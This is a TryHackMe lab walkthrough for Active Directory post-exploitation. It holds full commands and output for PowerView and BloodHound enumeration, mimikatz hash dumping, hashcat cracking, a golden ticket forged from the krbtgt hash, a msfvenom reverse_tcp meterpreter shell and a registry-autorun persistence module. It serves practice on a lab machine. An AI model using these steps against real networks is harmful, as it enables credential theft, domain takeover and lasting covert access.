TryHackMe - Post-Exploitation Basics Walkthrough

# TryHackMe - Post-Exploitation Basics Walkthrough This room covers basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom, created by [Cryillic](https://tryhackme.com/p/Cryillic). This room covers: - [x] Task 1 : Introduction - [x] Task 2 : Enumeration w/ Powerview - [x] Task 3 : Enumeration w/ Bloodhound - [x] Task 4 : Dumping hashes w/ mimikatz - [x] Task 5 : Golden Ticket Attacks w/ mimikatz - [x] Task 6 : Enumeration w/ Server Manager - [x] Task 7 : Maintaining Access --- ## Task 1: Introduction This room on TryHackME covers the basics of post-exploitation, after gaining acces to an Active Directory AD machine. Enumeration of this will use tools such as powerview mimikatz and bloodhound. We will dump password hashes and golden tickets using mimikatz, gather information from the windows server then use metasploit to gain persistency into the machine. --- ## Task 2 : Enumeration w/ Powerview To start the room we can use RDP or SSH into the machine with the credentials: - Username: `Administrator` - Password: `P@$$W0rd` - Domain Name: `CONTROLLER` ### Powerview This is a powerful powershell script that can be used for enumerating a domain after you have gained a shell in the system. We can download PowerView from [here](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) as ****PowerView.ps1**** 1. Start Powershell using `powershell -ep bypass` . `-ep` bypasses the execution policy of powershell allowing you to easily run scripts. 2. Start PowerView - `. .\Downloads\PowerView.ps1` 3. Enumerate the domain users - `Get-NetUser | select cn` ![](https://i.imgur.com/gdmm06C.png) 4. Enumerate the domain groups - `Get-NetGroup -GroupName *admin*` ![](https://i.imgur.com/LazCfI3.png) ### Questions 1. What is the shared folder that is not set by default? `Share` ![](https://i.imgur.com/2yKPKUn.png) 2. What operating system is running inside of the network besides Windows Server 2019? `Windows 10 Enterprise Evaluation` ![](https://i.imgur.com/5uitK9x.png) 3. I’ve hidden a flag inside of the users find it. `POST{P0W3RV13W_FTW}` --- ## Task 3: Enumeration w/ Bloodhound `Bloodhound` is a graphical interface that allows you to visually map out the network. This tool together with `[SharpHound](https://github.com/BloodHoundAD/SharpHound)` takes the user, groups, trusts, etc of the network and collects them into `.json` files to be used inside Bloodhound. ### BloodHound Installation 1. `sudo apt install bloodhound` 2. `sudo neo4j console` ### Getting loot w/ SharpHound 1. `powershell -ep bypass` 2. `. .\Downloads\SharpHound.ps1` 3. `Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip` ```powershell PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip ----------------------------------------------- Initializing SharpHound at 5:37 AM on 8/11/2022 ----------------------------------------------- Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container [+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL [+] Cache File not Found: 0 Objects in cache [+] Pre-populating Domain Controller SIDS Status: 0 objects finished (+0) -- Using 72 MB RAM Status: 66 objects finished (+66 33)/s -- Using 80 MB RAM Enumeration finished in 00:00:02.2222608 Compressing data to C:\Users\Administrator\20220811053745_loot.zip You can upload this file directly to the UI SharpHound Enumeration Completed at 5:37 AM on 8/11/2022! Happy Graphing! ``` Transfer the loot zip file to our attacking machine using `scp` if connected using `ssh` ```bash ┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation] └─[$] <> scp Administrator@10.10.11.93:20220811025924_loot.zip 20220811025924_loot.zip Administrator@10.10.11.93's password: 20220811025924_loot. 100% 9539 9.3KB/s 00:01 ``` I experienced issues while running the zip file as bloodhound was reporting bad json. I therefore uploaded the latest version of `sharphound` as below and used it to get our loot. ```bash ┌─[kali@kali] - [~/tools/BloodHound/Collectors] └─[$] <> scp SharpHound.exe Administrator@10.10.72.5:SharpHound.exe Administrator@10.10.72.5's password: SharpHound.exe ``` ```bash PS C:\Users\Administrator> . .\SharpHound.exe --collectionmethods All --domain CONTROLLER.local --zipfilename loot.zip 2022-08-11T06:37:58.3852711-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound 2022-08-11T06:37:58.5571459-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2022-08-11T06:37:58.5727475-07:00|INFORMATION|Initializing SharpHound at 6:37 AM on 8/11/2022 2022-08-11T06:37:58.9165260-07:00|INFORMATION|Loaded cache with stats: 62 ID to type mappings. 63 name to SID mappings. 0 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings. 2022-08-11T06:37:58.9321453-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2022-08-11T06:37:59.1040229-07:00|INFORMATION|Producer has finished, closing LDAP channel 2022-08-11T06:37:59.1508947-07:00|INFORMATION|LDAP channel closed, waiting for consumers 2022-08-11T06:38:29.1821539-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM 2022-08-11T06:38:42.5271796-07:00|INFORMATION|Consumers finished, closing output channel 2022-08-11T06:38:42.5583848-07:00|INFORMATION|Output channel closed, waiting for output task to complete Closing writers 2022-08-11T06:38:42.6521887-07:00|INFORMATION|Status: 104 objects finished (+104 2.418605)/s -- Using 42 MB RAM 2022-08-11T06:38:42.6521887-07:00|INFORMATION|Enumeration finished in 00:00:43.5858822 2022-08-11T06:38:42.7303070-07:00|INFORMATION|Saving cache with stats: 62 ID to type mappings. 64 name to SID mappings. 0 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings. 2022-08-11T06:38:42.7459344-07:00|INFORMATION|SharpHound Enumeration Completed at 6:38 AM on 8/11/2022! Happy Graphing! ``` Now we can analyze successfully with `Bloodhound` ### Mapping the network w/ BloodHound First off we need to start up `neo4j` before starting Bloodhound in another terminal. ```bash ┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation] └─[$] sudo neo4j console ``` Enter the default credentials for neo4j as `neo4j:neo4j` on the site that opens up at `http://localhost:7474/browser/` login then change the creds to anything you wish as prompted. Next up launch bloodhound. Use the `Import Graph` option or directly drag and drop the zip file onto bloodhound for further analysis. We can then choose any query we want. ![](https://i.imgur.com/p8sPAQs.png) ### Questions 1. What service is also a domain admin? `SQLSERVICE` ![](https://i.imgur.com/Ao9HOAZ.png) 2. What two users are Kerberoastable? `SQLSERVICE,KRBTGT` ![](https://i.imgur.com/gTLkE5w.png) --- ## Task 4 : Dumping hashes w/ mimikatz `Mimikatz` is a popular and powerful exploitation tool used for dumping user credentials inside of an active directory network. We will dump the NTLM hashes with mimikatz and then cracking those hashes using hashcat. ### Dump Hashes Launch Mimikatz from the `\Downloads` directory and run `privilege::debug` to ensure that you’re running mimikatz as an administrator, if not mimikatz does not run properly. ![](https://i.imgur.com/HgVXEjB.png) ![](https://i.imgur.com/su5LNeV.png) Dump the hashes using `lsadump::lsa /patch` ```bash mimikatz # lsadump::lsa /patch Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 RID : 000001f4 (500) User : Administrator LM : NTLM : 2777b7fec870e04dda00cd7260f7bee6 RID : 000001f5 (501) User : Guest LM : NTLM : RID : 000001f6 (502) User : krbtgt LM : NTLM : 5508500012cc005cf7082a9a89ebdfdf RID : 0000044f (1103) User : Machine1 LM : NTLM : 64f12cddaa88057e06a81b54e73b949b RID : 00000451 (1105) User : Admin2 LM : NTLM : 2b576acbe6bcfda7294d6bd18041b8fe RID : 00000452 (1106) User : Machine2 LM : NTLM : c39f2beb3d2ec06a62cb887fb391dee0 RID : 00000453 (1107) User : SQLService LM : NTLM : f4ab68f27303bcb4024650d8fc5f973a RID : 00000454 (1108) User : POST LM : NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2 RID : 00000457 (1111) User : sshd LM : NTLM : 2777b7fec870e04dda00cd7260f7bee6 RID : 000003e8 (1000) User : DOMAIN-CONTROLL$ LM : NTLM : 7bb0c59ff58520b2e3ef7d95d294b1a4 RID : 00000455 (1109) User : DESKTOP-2$ LM : NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c RID : 00000456 (1110) User : DESKTOP-1$ LM : NTLM : 7d33346eeb11a4f12a6c201faaa0d89a ``` ### Cracking the hashes w/ hashcat For this, we can use `rockyou.txt` wordlist with the command: ```bash hashcat -m 1000 hash.txt /path/to/rockyou.txt ``` ### Questions: 1. What is the Machine1 password? `Password1` ```bash ┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation] └─[$] <> hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt hashcat (v6.2.5) starting OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ============================================================================================================================================ * Device #1: pthread-Intel(R) Core(TM) i7-4600U CPU @ 2.10GHz, 2917/5899 MB (1024 MB allocatable), 4MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Early-Skip * Not-Salted * Not-Iterated * Single-Hash * Single-Salt * Raw-Hash ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 1 MB Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 64f12cddaa88057e06a81b54e73b949b:Password1 Session..........: hashcat Status...........: Cracked Hash.Mode........: 1000 (NTLM) Hash.Target......: 64f12cddaa88057e06a81b54e73b949b Time.Started.....: Thu Aug 11 11:42:26 2022 (0 secs) Time.Estimated...: Thu Aug 11 11:42:26 2022 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 1508.0 kH/s (0.25ms) @ Accel:512 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 4096/14344385 (0.03%) Rejected.........: 0/4096 (0.00%) Restore.Point....: 2048/14344385 (0.01%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: slimshady -> oooooo Hardware.Mon.#1..: Util: 29% Started: Thu Aug 11 11:42:25 2022 Stopped: Thu Aug 11 11:42:31 2022 ``` 2. What is the Machine2 Hash? `c39f2beb3d2ec06a62cb887fb391dee0` ```bash RID : 00000454 (1108) User : POST User : Machine2 LM : NTLM : c39f2beb3d2ec06a62cb887fb391dee0 ``` --- ## Task 5 : Golden Ticket Attacks w/ mimikatz > A `Golden Ticket attack` is a type of attack in which an adversary gains control over an Active Directory Key Distribution Service Account (KRBTGT), and uses that account to forge valid Kerberos Ticket Granting Tickets (TGTs). > From this definition and the previous hashdump that we got, there’s a `krbtgt` hash. ```bash RID : 000001f6 (502) User : krbtgt LM : NTLM : 5508500012cc005cf7082a9a89ebdfdf ``` Having the SID and NTLM hash for the krbtgt account will therefore enable us to crease a custom TGT which is the Golden Ticket, therefore allowing us to use any machine or account in the AD network. With the running mimikatz process running we can run the following but incase you closed it run the following first: ```bash mimikatz # privilege::debug Privilege '20' OK ``` Then proceed to dump the hash of krbtgt: ```bash mimikatz # lsadump::lsa /inject /name:krbtgt Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 RID : 000001f6 (502) User : krbtgt * Primary NTLM : 5508500012cc005cf7082a9a89ebdfdf LM : Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf lm - 0: 372f405db05d3cafd27f8e6a4a097b2c * WDigest 01 49a8de3b6c7ae1ddf36aa868e68cd9ea 02 7902703149b131c57e5253fd9ea710d0 03 71288a6388fb28088a434d3705cc6f2a 04 49a8de3b6c7ae1ddf36aa868e68cd9ea 05 7902703149b131c57e5253fd9ea710d0 06 df5ad3cc1ff643663d85dabc81432a81 07 49a8de3b6c7ae1ddf36aa868e68cd9ea 08 a489809bd0f8e525f450fac01ea2054b 09 19e54fd00868c3b0b35b5e0926934c99 10 4462ea84c5537142029ea1b354cd25fa 11 6773fcbf03fd29e51720f2c5087cb81c 12 19e54fd00868c3b0b35b5e0926934c99 13 52902abbeec1f1d3b46a7bd5adab3b57 14 6773fcbf03fd29e51720f2c5087cb81c 15 8f2593c344922717d05d537487a1336d 16 49c009813995b032cc1f1a181eaadee4 17 8552f561e937ad7c13a0dca4e9b0b25a 18 cc18f1d9a1f4d28b58a063f69fa54f27 19 12ae8a0629634a31aa63d6f422a14953 20 b6392b0471c53dd2379dcc570816ba10 21 7ab113cb39aa4be369710f6926b68094 22 7ab113cb39aa4be369710f6926b68094 23 e38f8bc728b21b85602231dba189c5be 24 4700657dde6382cd7b990fb042b00f9e 25 8f46d9db219cbd64fb61ba4fdb1c9ba7 26 36b6a21f031bf361ce38d4d8ad39ee0f 27 e69385ee50f9d3e105f50c61c53e718e 28 ca006400aefe845da46b137b5b50f371 29 15a607251e3a2973a843e09c008c32e3 * Kerberos Default Salt : CONTROLLER.LOCALkrbtgt Credentials des_cbc_md5 : 64ef5d43922f3b5d * Kerberos-Newer-Keys Default Salt : CONTROLLER.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc64246bda3c75fe53d aes128_hmac (4096) : 7eb35bddd529c0614e5ad9db4c798066 des_cbc_md5 (4096) : 64ef5d43922f3b5d * NTLM-Strong-NTOWF Random Value : 666caaaaf30081f30211bd7fa445fec4 ``` We can create the Golden ticket using any username apart from the SID, domain name and password hash which must be correct with the krbtgt SID and password hash. ```bash mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500 User : Administrator Domain : controller.local (CONTROLLER) SID : S-1-5-21-849420856-2351964222-986696166 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt Lifetime : 8/11/2022 11:19:47 AM ; 8/8/2032 11:19:47 AM ; 8/8/2032 11:19:47 AM -> Ticket : ticket.kirbi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file ! ``` Use `misc::cmd` to open a new command prompt with elevated privileges to all machines. ```bash mimikatz # misc::cmd Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF6427A43B8 ``` --- ## Task 6 : Enumeration w/ Server Manager Servers are hardly ever logged on unless for maintenance, this gives an easy way for enumeration only using the built in windows features such as the `server manager` If you have domain `admin` you have alot of access to the server manager in order to change trusts, add or remove users, look at groups etc, then this can be a great entry point to find other users with other sensitive information on their machines or find other users on the domain network with access to other networks to pivot to another network. For this we need to rdp into the server as below: ```bash ┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation] └─[$] <> rdesktop -u Administrator -d CONTROLLER 10.10.33.104 ``` ![](https://i.imgur.com/9obUhZ1.png) ### Enumerate w/ Server Manager When we open the server we get a number of options(as below) which we can use to enumerate the server, from adding roles, editing them etc. However these can be flagged by system admins. ![](https://i.imgur.com/EgKpiqr.png) Navigate to the tools tab and select the Active Directory Users and Computers. This brings up a list of all users on the domain as well as some other useful tabs such as groups and computers. ![](https://i.imgur.com/3XrVVqO.png) ![](https://i.imgur.com/tfWHttV.png) ### Questions 1. What tool allows to view the event logs? `Event Viewer` ![](https://i.imgur.com/z3076rz.png) ![](https://i.imgur.com/NbCfUaH.png) 2. What is the SQL Service password? `MYpassword123#` ![](https://i.imgur.com/vYuDgWn.png) --- ## Task 7 : Maintaining Access For this lab, we will use `Metasploit` for persistence, creating a meterpreter shell on the victims machine which we can connect to even if the machine shuts down. Other means include, advanced backdoors and rootkits, etc. ### Generating a payload w/ msfvenom We can generate a windows meterpreter reverse_tcp shell which we can transfer to our attackbox. ```bash ┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation] └─[$] <> msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT=4444 -f exe -o shell.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of exe file: 73802 bytes Saved as: shell.exe ┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation] └─[$] <> scp shell.exe Administrator@10.10.242.212:shell.exe ┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation] └─[$] <> scp shell.exe Administrator@10.10.136.0:shell.exe Administrator@10.10.136.0's password: shell.exe ``` Once the file is transferred, ssh into the machine and confirm that it was transferred. ```bash ┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation] └─[$] <> ssh Administrator@10.10.136.0 Administrator@10.10.136.0's password: Microsoft Windows [Version 10.0.17763.737] (c) 2018 Microsoft Corporation. All rights reserved. controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>dir Volume in drive C has no label. Volume Serial Number is F83F-6346 Directory of C:\Users\Administrator 08/12/2022 01:33 PM <DIR> . 08/12/2022 01:33 PM <DIR> .. 05/13/2020 08:01 PM <DIR> 3D Objects 05/13/2020 08:01 PM <DIR> Contacts 05/13/2020 08:01 PM <DIR> Desktop 05/14/2020 08:27 PM <DIR> Documents 10/03/2020 08:33 AM <DIR> Downloads 05/13/2020 08:01 PM <DIR> Favorites 05/13/2020 08:01 PM <DIR> Links 05/13/2020 08:01 PM <DIR> Music 05/13/2020 08:01 PM <DIR> Pictures 05/13/2020 08:01 PM <DIR> Saved Games 05/13/2020 08:01 PM <DIR> Searches 08/12/2022 01:33 PM 73,802 shell.exe 05/13/2020 08:01 PM <DIR> Videos 1 File(s) 73,802 bytes 14 Dir(s) 52,008,374,272 bytes free controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator> ``` On another terminal launch metasploit using `msfconsole` command and use `exploit/multi/handler` to listen to the reverse shell. Set the LHOST and LPORT Configure our payload to be a windows meterpreter shell using: `set payload windows/meterpreter/reverse_tcp` Then run the exploit fist followed by the shell in our attackbox. ```bash ┌─[kali@kali] - [~] └─[$] <> msfconsole -q msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set LHOST IP LHOST => IP msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on IP:4444 [*] Sending stage (175686 bytes) to 10.10.136.0 id [*] Meterpreter session 11 opened (IP:4444 -> 10.10.136.0:49885) at 2022-08-12 16:49:06 -0400 meterpreter > ``` Our meterpreter listener will recieve an incoming connection, background the shell using `bg` in order to run the persistence module. ```bash meterpreter > bg [*] Backgrounding session 11... msf6 exploit(multi/handler) > use exploit/windows/local/persistence [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/persistence) > ``` ### Run the Persistence Module We will use `exploit/windows/local/persistence` to send a payload every 10 seconds in defualt. Set the session to the session that we backgrounded in this case `session 11` After which we can run the exploit. ```bash msf6 exploit(windows/local/persistence) > set session 11 session => 11 msf6 exploit(windows/local/persistence) > run [*] Running persistent module against DOMAIN-CONTROLL via session ID: 11 [+] Persistent VBS script written on DOMAIN-CONTROLL to C:\Users\Administrator\AppData\Local\Temp\AFjTyniKyCbKq.vbs [*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\HbpPWIFt [+] Installed autorun on DOMAIN-CONTROLL as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\HbpPWIFt [*] Clean up Meterpreter RC file: /home/kali/.msf4/logs/persistence/DOMAIN-CONTROLL_20220812.5441/DOMAIN-CONTROLL_20220812.5441.rc ``` On running the pesistence module, the old session dies and a new session is spawned. Awesome!!!! We are done with a section through the AD journey, I do hope you have gotten to learn something with me. Happy Hacking!!!